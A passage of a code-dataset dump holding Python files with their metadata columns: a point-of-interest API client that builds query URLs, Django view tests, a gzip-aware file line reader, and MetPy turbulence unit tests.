url = self.address + "dist?lat="+lat+"&lon="+lon+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&dist="+dist+"&key="+self.key
elif num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&dist="+dist+"&key="+self.key
elif order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&dist="+dist+"&key="+self.key
else:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&dist="+dist+"&key="+self.key
return request(url)
def distance_id(self, poi_id = None, cat = None, conc = None, dist = None, num_poi=None, order=None):
if poi_id is None:
return ("Error, missing ID")
if dist is None:
return ("Error, missing distance")
if not isinstance(poi_id, str):
poi_id = str(poi_id)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(dist, str):
dist = str(dist)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if order is not None:
if not isinstance(order, str):
order = str(order)
if cat and conc and num_poi and order:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat and num_poi and order:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and num_poi:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and order:
url = self.address + "dist_id?id="+poi_id+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and conc:
url = self.address + "dist_id?id="+poi_id+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat:
url = self.address + "dist_id?id="+poi_id+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif conc and num_poi and order:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and num_poi:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and order:
url = self.address + "dist_id?id="+poi_id+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc:
url = self.address + "dist_id?id="+poi_id+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif num_poi and order:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&dist="+dist+"&key="+self.key
elif num_poi:
url = self.address + "dist_id?id="+poi_id+"&numpoi="+num_poi+"&dist="+dist+"&key="+self.key
elif order:
url = self.address + "dist_id?id="+poi_id+"&order="+order+"&dist="+dist+"&key="+self.key
else:
url = self.address + "dist_id?id="+poi_id+"&dist="+dist+"&key="+self.key
return request(url)
def time_coord(self, lat = None, lon = None, cat = None, conc = None, time = None, num_poi = None, order = None):
if lat is None or lon is None:
return ("Error, missing Latitude or Longitude")
if time is None:
return ("Error, missing time")
if not isinstance(lat, str):
lat = str(lat)
if not isinstance(lon, str):
lon = str(lon)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(time, str):
time = str(time)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if order is not None:
if not isinstance(order, str):
order = str(order)
if cat and conc and num_poi and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&conc="+conc+"&time="+time+"&key="+self.key
elif cat and num_poi and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and num_poi:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&order="+order+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and conc:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&cat="+cat+"&conc="+conc+"&time="+time+"&key="+self.key
elif cat:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&cat="+cat+"&time="+time+"&key="+self.key
elif conc and num_poi and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc and num_poi:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&order="+order+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&conc="+conc+"&time="+time+"&key="+self.key
elif num_poi and order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&time="+time+"&key="+self.key
elif num_poi:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&time="+time+"&key="+self.key
elif order:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&order="+order+"&time="+time+"&key="+self.key
else:
url = self.address + "poi_time?lat="+lat+"&lon="+lon+"&time="+time+"&key="+self.key
return request(url)
def time_id(self, poi_id = None, cat = None, conc = None, time = None, num_poi=None, order=None):
if poi_id is None:
return ("Error, missing ID")
if time is None:
return ("Error, missing time")
if not isinstance(poi_id, str):
poi_id = str(poi_id)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(time, str):
time = str(time)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if order is not None:
if not isinstance(order, str):
order = str(order)
if cat and conc and num_poi and order:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&conc="+conc+"&time="+time+"&key="+self.key
elif cat and num_poi and order:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and num_poi:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and order:
url = self.address + "poi_time_id?id="+poi_id+"&order="+order+"&cat="+cat+"&time="+time+"&key="+self.key
elif cat and conc:
url = self.address + "poi_time_id?id="+poi_id+"&cat="+cat+"&conc="+conc+"&time="+time+"&key="+self.key
elif cat:
url = self.address + "poi_time_id?id="+poi_id+"&cat="+cat+"&time="+time+"&key="+self.key
elif conc and num_poi and order:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc and num_poi:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc and order:
url = self.address + "poi_time_id?id="+poi_id+"&order="+order+"&conc="+conc+"&time="+time+"&key="+self.key
elif conc:
url = self.address + "poi_time_id?id="+poi_id+"&conc="+conc+"&time="+time+"&key="+self.key
elif num_poi and order:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&order="+order+"&time="+time+"&key="+self.key
elif num_poi:
url = self.address + "poi_time_id?id="+poi_id+"&numpoi="+num_poi+"&time="+time+"&key="+self.key
elif order:
url = self.address + "poi_time_id?id="+poi_id+"&order="+order+"&time="+time+"&key="+self.key
else:
url = self.address + "poi_time_id?id="+poi_id+"&time="+time+"&key="+self.key
return request(url)
def route_calc(self, poi_id = None, cat = None, conc = None, days = None, duration = None, start_time = None):
if poi_id is None:
return ("Error, missing ID")
if duration is None:
return ("Error, missing duration")
if start_time is None:
return ("Error, missing start_time")
if days is None:
return ("Error, missing days")
if not isinstance(poi_id, str):
poi_id = str(poi_id)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(days, str):
days = str(days)
if not isinstance(duration, str):
duration = str(duration)
if not isinstance(start_time, str):
start_time = str(start_time)
if cat and conc:
url = self.address + "route_calc_id?id="+poi_id+"&cat="+cat+"&conc="+conc+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
elif cat:
url = self.address + "route_calc_id?id="+poi_id+"&cat="+cat+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
elif conc:
url = self.address + "route_calc_id?id="+poi_id+"&conc="+conc+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
else:
url = self.address + "route_calc_id?id="+poi_id+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
return request(url)
def route_calc_coord(self, lat = None, lon = None, cat = None, conc = None, days = None, duration = None, start_time = None):
if lat is None or lat is None:
return ("Error, missing coordinates")
if duration is None:
return ("Error, missing duration")
if start_time is None:
return ("Error, missing start_time")
if days is None:
return ("Error, missing days")
if not isinstance(lat, str):
lat = str(lat)
if not isinstance(lon, str):
lon = str(lon)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(days, str):
days = str(days)
if not isinstance(duration, str):
duration = str(duration)
if not isinstance(start_time, str):
start_time = str(start_time)
if cat and conc:
url = self.address + "route_calc_coord?lat="+lat+"&lon="+lon+"&cat="+cat+"&conc="+conc+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
elif cat:
url = self.address + "route_calc_coord?lat="+lat+"&lon="+lon+"&cat="+cat+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
elif conc:
url = self.address + "route_calc_coord?lat="+lat+"&lon="+lon+"&conc="+conc+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
else:
url = self.address + "route_calc_coord?lat="+lat+"&lon="+lon+"&days="+days+"&start_time="+start_time+"&duration="+duration+"&key="+self.key
return request(url)
def poi_cat_conc(self, cat = None, conc = None, num_poi=None, min_score=None):
if cat is None and conc is None:
return ("Error, missing category or concelho")
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if min_score is not None:
if not isinstance(min_score, str):
min_score = str(min_score)
if cat and conc and num_poi and min_score:
url = self.address + "poi?cat="+cat+"&conc="+conc+"&numpoi="+num_poi+"&score="+min_score+"&key="+self.key
elif cat and num_poi and min_score:
url = self.address + "poi?&numpoi="+num_poi+"&score="+min_score+"&cat="+cat+"&key="+self.key
elif cat and num_poi:
url = self.address + "poi?&numpoi="+num_poi+"&cat="+cat+"&key="+self.key
elif cat and min_score:
url = self.address + "poi?&score="+min_score+"&cat="+cat+"&key="+self.key
elif cat and conc:
url = self.address + "poi?&cat="+cat+"&conc="+conc+"&key="+self.key
elif cat:
url = self.address + "poi&cat="+cat+"&key="+self.key
elif conc and num_poi and min_score:
url = self.address + "poi?&numpoi="+num_poi+"&score="+min_score+"&conc="+conc+"&key="+self.key
elif conc and num_poi:
url = self.address + "poi?&numpoi="+num_poi+"&conc="+conc+"&key="+self.key
elif conc and min_score:
url = self.address + "poi?&score="+min_score+"&conc="+conc+"&key="+self.key
elif conc:
url = self.address + "poi?&conc="+conc+"&key="+self.key
elif num_poi and min_score:
url = self.address + "poi?&numpoi="+num_poi+"&score="+min_score+"&key="+self.key
elif num_poi:
url = self.address + "poi?&numpoi="+num_poi+"&key="+self.key
elif min_score:
url = self.address + "poi?&score="+min_score+"&key="+self.key
return request(url)
def poi_by_id(self, poi_id = None):
if poi_id is None:
return ("Error, missing ID")
if not isinstance(poi_id, str):
poi_id = str(poi_id)
url = self.address + "poi_id?id="+poi_id+"&key="+self.key
return request(url)
def OSRM_poi_to_poi(self, poi_id = None, poi_id2 = None, profile = "driving"):
if poi_id is None or poi_id2 is None:
return ("Error, missing ID")
profile = profile.lower()
if not isinstance(poi_id, str):
poi_id = str(poi_id)
if not isinstance(poi_id2, str):
poi_id2 = str(poi_id2)
url = self.address + "osrm_poipoi?id="+poi_id+"&id2="+poi_id2+"&profile="+profile+"&key="+self.key
return request(url)
def OSRM_poi_to_coord(self, poi_id = None, lat = None, lon = None, profile = "driving", switch = 0):
if poi_id is None:
return ("Error, missing ID")
if lat is None or lat is None:
return ("Error, missing coordinates")
profile = profile.lower()
if not isinstance(poi_id, str):
poi_id = str(poi_id)
if not isinstance(lat, str):
lat = str(lat)
if not isinstance(lon, str):
lon = str(lon)
if switch == 1:
url = self.address + "osrm_poipoint?id="+poi_id+"&lat="+lat+"&lon="+lon+"&profile="+profile+"&key="+self.key
else:
url = self.address + "osrm_pointpoi?id="+poi_id+"&lat="+lat+"&lon="+lon+"&profile="+profile+"&key="+self.key
return request(url)
def route_by_id(self, route_id = None):
if route_id is None:
return ("Error, missing ID")
if not isinstance(route_id, str):
route_id = str(route_id)
url = self.address + "route_id?id="+route_id+"&key="+self.key
return request(url) | 51.994778 | 177 | 0.546801 | 2,785 | 19,914 | 3.79246 | 0.028007 | 0.053967 | 0.108692 | 0.084832 | 0.941867 | 0.929653 | 0.92492 | 0.917724 | 0.902291 | 0.865366 | 0 | 0.000763 | 0.276489 | 19,914 | 383 | 178 | 51.994778 | 0.732302 | 0 | 0 | 0.65847 | 0 | 0 | 0.179965 | 0.005574 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.002732 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e46d2de762fb98fbe018c95d26b4a324b2254db0 | 4,364 | py | Python | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.urls import reverse
from hknweb.candidate.models import OffChallenge
from hknweb.candidate.tests.views.utils import CandidateViewTestsBase
class ChallengeConfirmViewTests(CandidateViewTestsBase):
def test_challenge_confirm_get_returns_200(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
response = self.client.get(reverse("candidate:challengeconfirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 200)
def test_challenge_confirm_post_returns_302(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_challenge_confirm_same_id_returns_403(self):
self.client.login(username=self.officer2.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 403)
def test_challenge_confirm_post_confirmed_sends_true_email(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
oc.csec_confirmed = True
oc.save()
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_challenge_confirm_post_not_confirmed_sends_false_email(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
oc.csec_confirmed = True
oc.save()
kwargs = {"pk": oc.id}
data = {"officer_confirmed": False}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_confirm_get_returns_404(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"id": oc.id}
response = self.client.get(reverse("candidate:confirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 404)
def test_confirm_post_returns_302(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"id": oc.id}
response = self.client.post(reverse("candidate:confirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_officer_review_confirmation_get_returns_200(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
response = self.client.get(reverse("candidate:reviewconfirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 200)
| 30.305556 | 88 | 0.645967 | 463 | 4,364 | 5.961123 | 0.12743 | 0.086957 | 0.04058 | 0.055072 | 0.874275 | 0.851449 | 0.838768 | 0.838768 | 0.837681 | 0.837681 | 0 | 0.013082 | 0.246792 | 4,364 | 143 | 89 | 30.517483 | 0.82659 | 0 | 0 | 0.68 | 0 | 0 | 0.062099 | 0.03506 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.08 | false | 0.08 | 0.03 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e46e60d02b3b27f6d8c6c735dd714fabcfce1a06 | 1,895 | py | Python | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | 1 | 2018-08-30T20:29:17.000Z | 2018-08-30T20:29:17.000Z | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | null | null | null | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | null | null | null | import subprocess
def read_file_by_lines(filepath, maxLines, linecount):
counter = 0
if filepath.endswith("gz") or filepath.endswith("gzip") or filepath.endswith("gz2"):
reading = subprocess.Popen(["gunzip", "-c", filepath], stdout=subprocess.PIPE, bufsize=1000000)
infile = reading.stdout
while True:
counter = counter + 1
if counter > maxLines:
return
data = [infile.readline().decode('utf8') for i in range(linecount)]
if data[0] == "":
return
yield data
else:
infile = open(filepath, 'r')
while True:
counter = counter + 1
if counter > maxLines:
return
data = [infile.readline() for i in range(linecount)]
if data[0] == "":
return
yield data
def read_filelines(filepath, maxLines, linecount, skip=0):
counter = 0
maxLines = maxLines+skip
if filepath.endswith("gz") or filepath.endswith("gzip") or filepath.endswith("gz2"):
reading = subprocess.Popen(["gunzip", "-c", filepath], stdout=subprocess.PIPE, bufsize=1000000)
infile = reading.stdout
while True:
counter = counter + 1
if counter <= skip:
continue
if counter > maxLines:
return
data = [infile.readline().decode('utf8') for i in range(linecount)]
if data[0] == "":
return
yield data
else:
infile = open(filepath, 'r')
while True:
counter = counter + 1
if counter <= skip:
continue
if counter > maxLines:
return
data = [infile.readline() for i in range(linecount)]
if data[0] == "":
return
yield data | 34.454545 | 103 | 0.520844 | 191 | 1,895 | 5.146597 | 0.240838 | 0.09766 | 0.073245 | 0.093591 | 0.856562 | 0.856562 | 0.856562 | 0.856562 | 0.856562 | 0.856562 | 0 | 0.024473 | 0.37467 | 1,895 | 55 | 104 | 34.454545 | 0.805063 | 0 | 0 | 0.923077 | 0 | 0 | 0.023207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.019231 | 0 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
900c3fc565499e93ee12bec4bd08db836b9ce151 | 15,099 | py | Python | metpy/calc/tests/test_turbulence.py | jtwhite79/MetPy | 8f1880be1ee98c17cd00ae556324386d2a6301ac | [
"BSD-3-Clause"
] | 3 | 2016-02-25T08:39:32.000Z | 2019-10-24T05:12:55.000Z | metpy/calc/tests/test_turbulence.py | wqshen/MetPy | fe15ec894bf15582576b090457c3000b4afb3555 | [
"BSD-3-Clause"
] | null | null | null | metpy/calc/tests/test_turbulence.py | wqshen/MetPy | fe15ec894bf15582576b090457c3000b4afb3555 | [
"BSD-3-Clause"
] | 2 | 2017-01-06T16:30:40.000Z | 2020-03-25T22:25:01.000Z | # Copyright (c) 2008-2015 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
from metpy.calc.turbulence import * # noqa
class TestTurbulenceKineticEnergy(object):
def get_uvw_and_known_tke(self):
u = np.array([-2, -1, 0, 1, 2])
v = -u
w = 2 * u
# 0.5 * sqrt(2 + 2 + 8)
e_true = np.sqrt(12) / 2.
return u, v, w, e_true
def test_no_tke_1d(self):
observations = 5
# given all the values are the same, there should not be any tke
u = np.ones(observations)
v = np.ones(observations)
w = np.ones(observations)
e_zero = 0
assert_array_equal(e_zero, tke(u, v, w))
def test_no_tke_2d_axis_last(self):
observations = 5
instruments = 2
# given all the values are the same, there should not be any tke
u = np.ones((instruments, observations))
v = np.ones((instruments, observations))
w = np.ones((instruments, observations))
e_zero = np.zeros(instruments)
assert_array_equal(e_zero, tke(u, v, w, axis=-1))
def test_no_tke_2d_axis_first(self):
observations = 5
instruments = 2
# given all the values are the same, there should not be any tke
u = np.ones((observations, instruments))
v = np.ones((observations, instruments))
w = np.ones((observations, instruments))
e_zero = np.zeros(instruments)
assert_array_equal(e_zero, tke(u, v, w, axis=0))
def test_known_tke(self):
u, v, w, e_true = self.get_uvw_and_known_tke()
assert_array_equal(e_true, tke(u, v, w))
def test_known_tke_2d_axis_last(self):
'''test array with shape (3, 5) [pretend time axis is -1]'''
u, v, w, e_true = self.get_uvw_and_known_tke()
u = np.array([u, u, u])
v = np.array([v, v, v])
w = np.array([w, w, w])
e_true = e_true * np.ones(3)
assert_array_equal(e_true, tke(u, v, w, axis=-1))
def test_known_tke_2d_axis_first(self):
'''test array with shape (5, 3) [pretend time axis is 0]'''
u, v, w, e_true = self.get_uvw_and_known_tke()
u = np.array([u, u, u]).transpose()
v = np.array([v, v, v]).transpose()
w = np.array([w, w, w]).transpose()
e_true = e_true * np.ones(3).transpose()
assert_array_equal(e_true, tke(u, v, w, axis=0))
assert_array_equal(e_true, tke(u, v, w, axis=0, perturbation=True))
class TestGetPerturbation(object):
def get_pert_from_zero_mean(self):
ts = np.array([-2, -1, 0, 1, 2])
pert_true = ts.copy()
return ts, pert_true
def get_pert_from_non_zero_mean(self):
ts = np.array([-2, 0, 2, 4, 6])
# ts.mean() = 2
pert_true = np.array([-4, -2, 0, 2, 4])
return ts, pert_true
def test_no_perturbation_1d(self):
observations = 5
# given all the values are the same, there should not be perturbations
ts = np.ones(observations)
pert_zero = 0
assert_array_equal(pert_zero, get_perturbation(ts))
def test_no_perturbation_2d_axis_last(self):
observations = 5
instruments = 2
# given all the values are the same, there should not be perturbations
ts = np.ones((instruments, observations))
pert_zero = np.zeros((instruments, observations))
assert_array_equal(pert_zero, get_perturbation(ts, axis=-1))
def test_no_tke_2d_axis_first(self):
observations = 5
instruments = 2
# given all the values are the same, there should not be perturbations
ts = np.ones((observations, instruments))
pert_zero = np.zeros((observations, instruments))
assert_array_equal(pert_zero, get_perturbation(ts, axis=0))
def test_known_perturbation_zero_mean_1d(self):
ts, pert_known = self.get_pert_from_zero_mean()
assert_array_equal(pert_known, get_perturbation(ts))
def test_known_perturbation_zero_mean_2d_axis_last(self):
ts, pert_known = self.get_pert_from_zero_mean()
ts = np.array([ts, ts, ts])
pert_known = np.array([pert_known, pert_known, pert_known])
assert_array_equal(pert_known, get_perturbation(ts, axis=-1))
def test_known_perturbation_zero_mean_2d_axis_first(self):
ts, pert_known = self.get_pert_from_zero_mean()
ts = np.array([ts, ts, ts]).transpose()
pert_known = np.array([pert_known, pert_known, pert_known]).transpose()
assert_array_equal(pert_known, get_perturbation(ts, axis=0))
def test_known_perturbation_non_zero_mean_1d(self):
ts, pert_known = self.get_pert_from_non_zero_mean()
assert_array_equal(pert_known, get_perturbation(ts))
def test_known_perturbation_non_zero_mean_2d_axis_last(self):
ts, pert_known = self.get_pert_from_non_zero_mean()
ts = np.array([ts, ts, ts])
pert_known = np.array([pert_known, pert_known, pert_known])
assert_array_equal(pert_known, get_perturbation(ts, axis=-1))
def test_known_perturbation_non_zero_mean_2d_axis_first(self):
ts, pert_known = self.get_pert_from_non_zero_mean()
ts = np.array([ts, ts, ts]).transpose()
pert_known = np.array([pert_known, pert_known, pert_known]).transpose()
assert_array_equal(pert_known, get_perturbation(ts, axis=0))
class TestKinematicFlux(object):
def get_uvw_and_known_kf_zero_mean(self):
u = np.array([-2, -1, 0, 1, 2])
v = -u
w = 2 * u
kf_true = {'uv': -2, 'uw': 4, 'vw': -4}
return u, v, w, kf_true
def get_uvw_and_known_kf_non_zero_mean(self):
u = np.array([-2, -1, 0, 1, 5])
v = -u
w = 2 * u
kf_true = {'uv': -5.84, 'uw': 11.68, 'vw': -11.68}
return u, v, w, kf_true
def test_kf_1d(self):
u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
assert_array_equal(kinematic_flux(u, v, perturbation=False),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False),
kf_true['vw'])
# given u, v, and w have a zero mean, the kf computed with
# perturbation=True and perturbation=False should be the same
assert_array_equal(kinematic_flux(u, v, perturbation=False),
kinematic_flux(u, v, perturbation=True))
assert_array_equal(kinematic_flux(u, w, perturbation=False),
kinematic_flux(u, w, perturbation=True))
assert_array_equal(kinematic_flux(v, w, perturbation=False),
kinematic_flux(v, w, perturbation=True))
# now use a non-zero mean
u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
assert_array_equal(kinematic_flux(u, v, perturbation=False),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False),
kf_true['vw'])
def test_kf_2d_axis_last(self):
u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
u = np.array([u, u, u])
v = np.array([v, v, v])
w = np.array([w, w, w])
for key in kf_true.keys():
tmp = kf_true[key]
kf_true[key] = np.array([tmp, tmp, tmp])
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
kf_true['vw'])
# given u, v, and w have a zero mean, the kf computed with
# perturbation=True and perturbation=False should be the same
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
kinematic_flux(u, v, perturbation=True, axis=-1))
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
kinematic_flux(u, w, perturbation=True, axis=-1))
assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
kinematic_flux(v, w, perturbation=True, axis=-1))
# now use a non-zero mean
u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
u = np.array([u, u, u])
v = np.array([v, v, v])
w = np.array([w, w, w])
for key in kf_true.keys():
tmp = kf_true[key]
kf_true[key] = np.array([tmp, tmp, tmp])
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
kf_true['vw'])
def test_kf_2d_axis_first(self):
u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
u = np.array([u, u, u]).transpose()
v = np.array([v, v, v]).transpose()
w = np.array([w, w, w]).transpose()
for key in kf_true.keys():
tmp = kf_true[key]
kf_true[key] = np.array([tmp, tmp, tmp]).transpose()
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
kf_true['uv'])
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
kf_true['uw'])
assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
kf_true['vw'])
# given u, v, and w have a zero mean, the kf computed with
# perturbation=True and perturbation=False should be the same
assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
kinematic_flux(u, v, perturbation=True, axis=0))
assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
kinematic_flux(u, w, perturbation=True, axis=0))
